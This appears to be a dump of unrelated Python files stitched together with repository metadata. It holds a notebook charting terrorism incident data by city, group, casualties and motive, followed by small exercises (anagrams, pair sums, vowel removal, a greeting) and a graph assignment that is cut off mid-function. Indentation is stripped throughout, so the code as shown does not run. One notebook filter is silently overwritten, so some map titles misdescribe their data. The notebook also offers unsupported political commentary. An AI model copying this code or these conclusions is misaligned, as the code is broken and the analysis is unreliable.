# We can see Iraq , Afaganistan and its neighbouring countries are constantly topping the charts in above 3 Heatmaps
# ---
# **Folium Maps to show cities with Private Citizens & Property as a target by Terrorists**
# ---
# > click on the circle to know the name of the city and Circle radius is proportional to the no of incidents occured in that city
# 1. Top 5 Indian Cities who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "India"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[28,81], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*300,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# 2. Top 5 Cities from Iraq who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "Iraq"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[33,44], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*20,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# 3. Top 5 Cities from Afaganistan who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "Afghanistan"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[33,70], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*100,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# 4. Top 5 Cities from Pakistan who has seen the terrorist acts the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror[terror['country_txt'] == "Pakistan"]
terror_filter = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':data['city'].value_counts().index,
'value':data['city'].value_counts().values
})
data = [
{
'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[28,70], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*100,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# Top Terrorist Groups
# ---
# In[ ]:
orgs = terror['gname'].value_counts().head(25).index
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(14, 10))
cmap = plt.get_cmap('coolwarm')
map = Basemap(projection='cyl')
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=1)
org=['Taliban','Shining Path (SL)']
#plt.scatter(5,15,s=50000,cmap=cmap,color = 'lightblue',marker='o',
# alpha=0.5, zorder=10)
plt.text(-60,70,'Terrorist Groups',color='r',fontsize=15)
plt.text(-60,65,'---------------------',color='r',fontsize=15)
j=60
for i in range(25) :
if i > 0 :
plt.text(-60,j,orgs[i],color='darkblue',fontsize=13)
j = j - 6
plt.title('Top Terrorist Groups across the world')
plt.show()
# Lets analyze top 5 active terrorist organizations and their presence
# ---
# In[ ]:
#terror['claimmode_txt'].value_counts()
f, ax = plt.subplots(figsize=(9, 6))
sns.barplot( y = terror['gname'].value_counts().head(6).index,
x = terror['gname'].value_counts().head(6).values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title('Active Terrorist Organizations' );
# 1) Taliban
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Taliban"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:3],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Taliban has waged a war against Afghanistan and the number of attacks have been increased in last few years
# ---
# 2) Shining Path (SL)
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Shining Path (SL)"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Peru suffered the most at the hand of Shining path during 80s to 90s
# ----
# 3) Islamic State of Iraq and the Levant (ISIL)
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Islamic State of Iraq and the Levant (ISIL)"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15,8 ))
g = sns.heatmap(terror_filter[0:20],annot=True,fmt="2.0f",cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# We all know the origin of this terror group but ISIL has started waging war against the neighbouring european countries too . We see Belgium and Russia has seen 2 incident in 2016. France has seen 9 attacks in the year 2015
# ---
# 4) Farabundo Marti National Liberation Front (FMLN)
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Farabundo Marti National Liberation Front (FMLN)"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([1991], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Farabundo Marti National Liberation Front (FMLN) had given tough time to El Salvador between 80s - 90s
# ---
# 5) Al-Shabaab
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Al-Shabaab"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Al-Shabaab is latest terrorist organization and is constantly targetting Somalia
# ---
# 6) Boko Haram
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Boko Haram"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Boko Haram has constantly targetted Nigeria in last few years
# ----
# Different modes used to assume responsibility of the attacks
# ----
# In[ ]:
#terror['claimmode_txt'].value_counts()
f, ax = plt.subplots(figsize=(9, 6))
sns.barplot( y = terror['claimmode_txt'].value_counts().index,
x = terror['claimmode_txt'].value_counts().values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title('Different modes used to assume responsibility of the attacks by Terrorists' );
# Heatmap Visualization to show Terrorist organizations using above mediums to assume responsibility of their henius act against humanity
# ---
# In[ ]:
terror_filter = terror[['gname','claimmode_txt']]
terror_filter = terror_filter.groupby(['gname','claimmode_txt'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values(['Personal claim','Posted to website, blog, etc.'], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(8, 10))
g = sns.heatmap(terror_filter[0:20],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Below top 4 Terrorist groups accepts their act personally or they have recruited educated young minds to post their act on Websites blog. whichever medium ensures spreading the news faster. <br>
# ---
#
# **1) Taliban <br>
# 2) Islamic State of Iraq and the Levant (ISIL) <br>
# 3) Al-Shabaab <br>
# 4) Tehrik-i-Taliban Pakistan(TTP)**
# Total confirmed fatalities as a direct result of attacks by Terrorists
# ---
# > **The number includes all victims and attackers who died as a direct result of the incident**
#
# In[ ]:
killed_terror = terror[['city','nkill']]
terror_filter = terror[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':killed_terror.dropna().groupby(['city'])['nkill'].sum().index,
'value':killed_terror.dropna().groupby(['city'])['nkill'].sum().values
})
data_city = data_city.sort_values(['value'], ascending=False)
data = [
{
'x': data_city['city'][0:20].values,
'y': data_city['value'][0:20].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:20]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
City_State = City_State.dropna()
count = City_State['value'].values
m = folium.Map(location=[28,2], tiles='stamentoner', zoom_start=2)
for i in range(0,100):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*100,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# Total number of injured
# ---
# In[ ]:
killed_terror = terror[['city','nwound']]
terror_filter = terror[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':killed_terror.dropna().groupby(['city'])['nwound'].sum().index,
'value':killed_terror.dropna().groupby(['city'])['nwound'].sum().values
})
data_city = data_city.sort_values(['value'], ascending=False)
data = [
{
'x': data_city['city'][0:20].values,
'y': data_city['value'][0:20].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:20]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
City_State = City_State.dropna()
count = City_State['value'].values
m = folium.Map(location=[28,2], tiles='stamentoner', zoom_start=2)
for i in range(0,50):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*50,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# Extent of Property Damage
# ----
# > (aggrgated damage from 1970 to 2016)
# In[ ]:
terror_filter1 = terror[terror['propextent_txt'] == "Catastrophic (likely > $1 billion)"]
terror_filter1 = terror_filter1[['country_txt','propvalue','iyear']]
terror_filter1 = terror_filter1.fillna(terror_filter1.propvalue.mean())
terror_filter = terror[terror['propextent_txt'] == "Major (likely > $1 million but < $1 billion)"]
terror_filter = terror_filter[['country_txt','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
terror_filter = terror_filter.append(terror_filter1)
terror_filter = terror_filter.groupby(['country_txt'])['propvalue'].sum()
data = dict(
type = 'choropleth',
locations = terror_filter.index,
locationmode = 'country names',
z = terror_filter.values,
text = terror_filter.index,
colorbar = {'title': 'Property Damage in US $'})
layout = dict( title = 'Extent of Property Damage in US $ across the world',
geo = dict(showframe = False,
projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# **cities and states from North America and Iraq are topping the list.**
# Extent of Property Damage over the Years across all the countries
# ----
# > Catastrophic (likely > $1 billion)
# In[ ]:
terror_filter = terror[terror['propextent_txt'] == "Catastrophic (likely > $1 billion)"]
terror_filter = terror_filter[['country_txt','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
#terror_filter = terror_filter.append(terror_filter1)
terror_filter = terror_filter.groupby(['country_txt','iyear'])['propvalue'].sum().unstack()
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(12,3))
g = sns.heatmap(terror_filter,cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# **9/11 attack in USA in the Year 2001 is the deadliest attack ever since 1970 **
# > Major (likely > $1 million but < $1 billion)
# In[ ]:
terror_filter = terror[terror['propextent_txt'] == "Major (likely > $1 million but < $1 billion)"]
terror_filter = terror_filter[['country_txt','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
#terror_filter = terror_filter.append(terror_filter1)
terror_filter = terror_filter.groupby(['country_txt','iyear'])['propvalue'].sum().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 30))
g = sns.heatmap(terror_filter,cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Extent of Property Damage over the Years across the globe
# ----
# In[ ]:
terror_filter = terror[terror['propextent_txt'] == "Major (likely > $1 million but < $1 billion)"]
#terror_filter = terror[terror['country_txt'] == "United States"]
terror_filter = terror_filter[['city','gname','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
terror_filter = terror_filter.sort_values(['iyear'], ascending=False)
terror_filter = terror_filter.groupby(['iyear'])['propvalue'].sum()
data = [
{
'x': terror_filter.index,
'y': terror_filter.values,
'mode': 'lines',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
}
}
]
iplot(data)
# We see a ups and down in the graph , can we assume that great amount time is spent by terrorist organizations for mass destruction just before the peaks in this graph ? I will leave this question unanswered at this moment as it requires a great deal of time to find the exact reason.
# In[ ]:
def text_process(mess):
# Check characters to see if they are in punctuation
nopunc = [char for char in mess if char not in string.punctuation]
# Join the characters again to form the string.
nopunc = ''.join(nopunc)
return(nopunc)
# Now just remove any stopwords
#return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
df = terror[['motive','country_txt','iyear']]
df = df.dropna()
df = df.reset_index(drop=True)
df['motive'] = df['motive'].apply(text_process)
# Shifting interests of Terrorists thru Timeline of Wordclouds
# ----
# In[ ]:
years = [2009,2010,2011,2012,2013,2014,2015,2016]
plt.figure(figsize=(14,15))
gs = gridspec.GridSpec(4, 2)
for i, cn in enumerate(years):
ax = plt.subplot(gs[i])
df_country = df[df['iyear'] == cn]
country_motive = df_country['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
ax.imshow(wordcloud)
ax.set_title('Year ' + str(cn) + ' at a glance' )
ax.axis('off')
# Motive behind attacks on USA over the years (1970 to 2016 aggregated)
# ---
# In[ ]:
df_country = df[df['country_txt'] == 'United States']
#df_country = df[df['iyear'] == 2014]
country_motive = df_country['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
plt.imshow(wordcloud)
fig=plt.gcf()
fig.set_size_inches(14,6)
plt.axis('off')
plt.show()
# USA from 2011 to 2016
# ---
# In[ ]:
years = [2011,2012,2013,2014,2015,2016]
df_country = df[df['country_txt'] == 'United States']
plt.figure(figsize=(14,15))
gs = gridspec.GridSpec(3, 2)
for i, cn in enumerate(years):
ax = plt.subplot(gs[i])
df_time = df_country[df_country['iyear'] == cn]
country_motive = df_time['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
ax.imshow(wordcloud)
ax.set_title('Year ' + str(cn) + ' at a glance' )
ax.axis('off')
# Motive behind attacks on India over the years (1970 to 2016 aggregated)
# ---
# In[ ]:
df_country = df[df['country_txt'] == 'India']
country_motive = df_country['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
plt.imshow(wordcloud)
fig=plt.gcf()
fig.set_size_inches(14,6)
plt.axis('off')
plt.show()
# India from 2011 to 2016
# ----
# In[ ]:
years = [2011,2012,2013,2014,2015,2016]
df_country = df[df['country_txt'] == 'India']
plt.figure(figsize=(14,9))
gs = gridspec.GridSpec(3, 2)
for i, cn in enumerate(years):
ax = plt.subplot(gs[i])
df_time = df_country[df_country['iyear'] == cn]
country_motive = df_time['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
ax.imshow(wordcloud)
ax.set_title('Year ' + str(cn) + ' at a glance' )
ax.axis('off')
# Maoist forces are in effect after 2014 , which is exactly when India saw change in hand at central government after a decade.
# ---
# Suicide attacks conducted by various Terrorist organizations
# ---
# In[ ]:
terror_filter = terror[terror['suicide'] == 1]
terror_filter = terror_filter.groupby(['gname','iyear'])['gname'].count().unstack()
terror_filter = terror_filter[[2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2012,2013,2014,2015,2016]]
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],annot=True,fmt="2.0f",cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# ISIL , Boko Haram and Taliban are the deadlist organizations World has ever witnessed . Look at the increasing numbers of suicide attacks from year 2013 till 2016 which is a worrying factor and it is likely to increase further.<br>
# ----
# Why are these organizations deadliest ?<br>
# ---
# > if these terrorist organizations have managed to brainwash people in great numbers to make them believe that their sacrifice will earn them a position in Heaven then just imagine in coming years they will succeed in building a big army which will be ready to lay down their life for their cause.
#
# To be continued
|
bfd2b36071000ac3d4d69251e4a3d0105cee316e | Ron-Chang/MyNotebook | /Coding/Python/Ron/Trials_and_Materials/sameLetters_rearrange.py | 1,087 | 4.1875 | 4 | """
What is an anagram?
Well, two words are anagrams of each other if they both contain the same letters.
For example:
anagrams('abba', ['aabb', 'abcd', 'bbaa', 'dada']) => ['aabb', 'bbaa']
anagrams('racer', ['crazer', 'carer', 'racar', 'caers', 'racer']) => ['carer', 'racer']
anagrams('laser', ['lazing', 'lazy', 'lacer']) => []
"""
def isCorrect(word, key):
word_set=set(word)
if len(list(set(word))) >= len(list(set(key))):
for w in word_set:
amt = word.count(w)
if key.count(w) != amt:
return False
return True
else:
return False
def anagrams(word,words):
result = []
for key in words:
if isCorrect(word, key):
result.append(key)
return(result)
# clever way
# def anagrams(word, words):
# return list(filter(lambda x: sorted(word.lower())==sorted(x.lower()),words))
x, y = "aaddc", "acdda"
m, n = "asda", "afdg"
foo = anagrams('abba', ['aabb', 'abcd', 'bbaa', 'dada'])
print(foo)
zoo = anagrams('racer', ['crazer', 'carer', 'racar', 'caers', 'racer'])
print(zoo)
|
f15bbfbf6221e14d9ec7de42756020152cf3b2ad | alinanananana/- | /lab3-5.py | 280 | 3.828125 | 4 | surname = input()
name = input()
group = input()
print('Привет,',surname, name,'из группы', group + '!')
print('Введи свою электронную почту?')
mail = input()
print(surname.lower()[:5] + 2 * (name.lower()[:5]) + 3 * mail.lower()[:5])
|
e6854655aa70ddfc032152b3ff593b100e0a33d5 | sarkarChanchal105/Coding | /misc/count-pairs-with-given-sum.py | 1,529 | 4.34375 | 4 | """
https://www.geeksforgeeks.org/count-pairs-with-given-sum/
Count pairs with given sum
Last Updated: 04-06-2020
Given an array of integers, and a number ‘sum’, find the number of pairs of integers in the array whose sum is equal to ‘sum’.
Examples:
Input : arr[] = {1, 5, 7, -1},
sum = 6
Output : 2
Pairs with sum 6 are (1, 5) and (7, -1)
Input : arr[] = {1, 5, 7, -1, 5},
sum = 6
Output : 3
Pairs with sum 6 are (1, 5), (7, -1) &
(1, 5)
Input : arr[] = {1, 1, 1, 1},
sum = 2
Output : 6
There are 3! pairs with sum 2.
Input : arr[] = {10, 12, 10, 15, -1, 7, 6,
5, 4, 2, 1, 1, 1},
sum = 11
Output : 9
Expected time complexity O(n)
"""
def getPairsCount(arr, sum):
dict={}
for a in arr:
if a in dict.keys():
dict[a]+=1
else:
dict[a]=1
print(dict)
count=0
pairs=[]
distinctPairs={}
for i in range(len(arr)):
complement = sum - arr[i]
if complement in dict.keys():
count+=1
pairs.append((arr[i],complement))
if (complement,arr[i]) not in distinctPairs.keys() and (arr[i],complement) not in distinctPairs.keys():
distinctPairs[(complement,arr[i])]=1
print(pairs)
print(count)
print(distinctPairs)
arr = [10, 12, 10, 15, -1, 7, 6,5, 4, 2, 1, 1, 1]
sum=11
getPairsCount(arr,sum)
arr = [1, 5, 7, -1, 5]
sum = 6
arr = [1, 6, 6, -1, 5,7]
sum = 12
getPairsCount(arr,sum)
|
73d9e33c9f7503f43ca41c746183eb8b3c5b7984 | hwakabh/codewars | /Python/7/DisemvowelTrolls/disemvowel_trolls.py | 392 | 4.0625 | 4 | import sys
def disemvowel(string):
vowels = ['a', 'A', 'o', 'O', 'i', 'I', 'u', 'U', 'e', 'E']
for v in vowels:
if v in string:
string = string.replace(v, '')
return string
if __name__ == "__main__":
if len(sys.argv) == 1:
inp = input('>>> Enter sentence to remove vowels: ')
print(disemvowel(string=inp))
else:
sys.exit(1)
|
7c3ebbbcb2936e97d871248215d8fb91f4c37297 | Dax246/FIT2004 | /Assignment 4/assignment4.py | 23,024 | 3.75 | 4 | """
This file contains the functions that solve question 1 and 2 from FIT2004 Assignment 4.
Graph class: Converts the vfile and efile into a graph that is stored using an edge list
captured_chains: Function which solves question 1
DFS: Runs depth first search
Terrain_pathfinding: Function which solves question 2
index_to_vehicle_type: Converts an index into the string that represents the vehicle type
Author: Damien Ambegoda (30594235)
Last modified: 3/11/2020
"""
from collections import deque
import re
from math import inf
import queue
class Graph:
""" Creates graph from vfile and efile
self.vertex_properties: stores the special property of each vertex
self.edge_list: stores the edges of each vertex. Each vertex is given a nested list.
Each vertex's ID is in the index to access its data in vertex_properties and edge_list
"""
def __init__(self, vfile, efile):
""" Initialises Graph by reading vfile and efile
:param vfile: txt file with vertex data. First line is the number of vertices and every other line is "a b"
where a is the vertex number and b is the property of the vertex.
:param efile: txt file with edge data. First line is the number of edges and every other line is "u v" where
u and v are vertex ID's and represents an edge between u and v
Time Complexity: O(V + E) where V is the number of vertices in vfile and E is the number of edges in efile
"""
# vertex_properties[i] stores the property of the vertex with ID = i
self.vertex_properties = []
# edge_list[i] stores the vertices that can be reached from the ith vertex
self.edge_list = [[]]
f = open(str(vfile))
vertex_counter = int(f.readline())
# Each vertex has its own index in vertex_properties and edge_list
self.vertex_properties = [None for _ in range(vertex_counter)]
self.edge_list = [[] for _ in range(vertex_counter)]
# Reads each line in vfile after the first line and stores the vertex property
for _ in range(vertex_counter):
line = f.readline()
x = re.findall(r'([0-9]*)( )([0-9]*)', line)
self.vertex_properties[int(x[0][0])] = int(x[0][2])
f.close()
f = open(str(efile))
edge_counter = int(f.readline())
# Reads each line in efile after the first line and stores the edge's destination in the edge_list. If the edge
# is between u and v, it stores v in u's edge list and stores u in v's edge list
for _ in range(edge_counter):
line = f.readline()
x = re.findall(r'([0-9]*)( )([0-9]*)', line)
u = x[0][0]
v = x[0][2]
self.edge_list[int(u)].append(int(v))
self.edge_list[int(v)].append(int(u))
f.close()
def captured_chains(vfile, efile):
""" Given the vertex data and edge data (discussed in Graph.__init__), the function determines what chains are
captured. It converts the vertex and edge data into a graph by calling the Graph class and using depth first search,
determines which chains of the same colour are not next to an empty vertex.
Time Complexity: O(V + E) where V is the number of vertices in the vfile and E is the number of edges in the
efile
"""
# Graph class convertes vfile and efile into a graph
graph = Graph(vfile, efile)
# visited list is global so it can be accessed through any of the recursive calls
global visited
visited = [0]*len(graph.vertex_properties)
res = []
# runs on every vertex which ensures that no vertex is skipped
for vertex_index in range(len(visited)):
# vertices may have already been visited due to being part of the DFS so the visited list ensures no vertex is
# visited more than once
if not visited[vertex_index]:
# current_chain and captured_chain_check is global so that it can be accessed through the recursive calls
global current_chain
current_chain = []
global captured_chain_check
# calls the queue class
captured_chain_check = deque()
DFS(graph, vertex_index)
if len(current_chain) != 0 and len(captured_chain_check) == 0:
res.append(current_chain)
captured_chain_check.clear()
return res
def DFS(graph, vertex_ID):
""" Given a graph and a source vertex, the function runs depth first search looking for chains which are vertices
with the same colour that are directly connected. It runs depth first search on a chain until there is nothing
else to add to the chain. Rather than returning anything, it adds to the global variables that are visited,
current_chain and captured_chain_check.
visited: keeps track of all vertices that are visited by DFS at some point
current_chain: keeps track of the current group of vertices that make up a chain.
captured_chain_check: a bool variable that checks whether the chain is captured or free. The chain will be free
if any member of the chain is next to an empty vertex
Time Complexity: O(V + E) where V is the number of vertices in the input graph and E is the number of edges in the
input graph
"""
# If vertex has been visited, don't run DFS again
if visited[vertex_ID] == 1:
return
visited[vertex_ID] = 1
# determines the colour of the vertex by referring to the vertex properties
colour = graph.vertex_properties[vertex_ID]
# if the vertex is empty then it cannot be part of a chain
if colour == 0:
return
# a variable just to check if the chain is captured or free
empty_vertex_neighbour = False
stack = deque()
# Checks all the neighbours of the current vertex
for edge in graph.edge_list[vertex_ID]:
# if any of the neighbours are empty then the chain is not captured
if graph.vertex_properties[edge] == 0:
empty_vertex_neighbour = True
# if the neighbour is the same colour it is part of the same chain. It is added to the stack as part of the
# implementation of depth first search
if graph.vertex_properties[edge] == colour:
stack.append(edge)
# if there is no empty vertex neighbour (so chain is still captured), it appends the current vertex to the list
# storing the chain. Else it stores a marker saying the chain is free
if not empty_vertex_neighbour:
current_chain.append(vertex_ID)
else:
captured_chain_check.append('X')
# It continues to call DFS as long as there are still vertices in the chain that have not been checked
while len(stack) != 0:
next_vertex = stack.pop()
DFS(graph, next_vertex)
def terrain_pathfinding(vfile, efile, crossing_time, transform_cost, start, end):
""" Given the vertices, edges, crossing time for each land type, the time it takes to transform, a start vertex
and an end vertex, the function determines the optimal time taken to reach the end vertex from the start vertex
and also returns the path taken
Time Complexity: O(E * logV) where E is the number of edges in efile and v is the number of vertices in vfile
"""
# no path or time needs to be taken if start == end
if start == end:
return (0, [])
# Calls the Graph class to create the graph from vfile and efile
graph = Graph(vfile, efile)
# Creates a priority queue
